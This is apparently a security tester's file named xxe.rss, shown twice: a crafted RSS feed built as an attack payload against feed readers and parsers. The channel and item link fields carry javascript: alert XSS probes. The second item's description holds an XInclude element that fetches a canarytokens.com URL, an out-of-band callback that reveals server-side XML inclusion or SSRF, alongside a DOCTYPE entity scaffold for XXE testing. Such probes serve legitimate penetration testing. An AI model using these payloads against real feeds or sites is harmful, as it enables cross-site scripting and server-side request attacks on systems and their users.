shiblisec/xxe.rss

## xxe.rss
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
    <title>TEST BLOG</title>
    <link>javascript:alert(document.domain)</link>
    <description>A blog about things</description>
    <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
    <item>
        <title>First post</title>
        <link>javascript:alert(0)</link>
        <description>a post</description>
        <author>author@example.com</author>
        <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
    </item>
    <item>
        <title>Second post</title>
        <link>javascript:alert(0)</link>
        <description><foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://canarytokens.com/traffic/23qcdnb283vv5rsi9q4ni7ovn/submit.aspx"/></foo></description>
        <author>author@example.com</author>
        <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
    </item>
</channel>
</rss>
	<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
	<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
	<title>TEST BLOG</title>
	<link>javascript:alert(document.domain)</link>
	<description>A blog about things</description>
	<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
	<item>
	<title>First post</title>
	<link>javascript:alert(0)</link>
	<description>a post</description>
	<author>author@example.com</author>
	<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
	</item>
	<item>
	<title>Second post</title>
	<link>javascript:alert(0)</link>
	<description><foo xmlns:xi="http://www.w3.org/2001/XInclude">
	<xi:include parse="text" href="http://canarytokens.com/traffic/23qcdnb283vv5rsi9q4ni7ovn/submit.aspx"/></foo></description>
	<author>author@example.com</author>
	<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
	</item>
	</channel>
	</rss>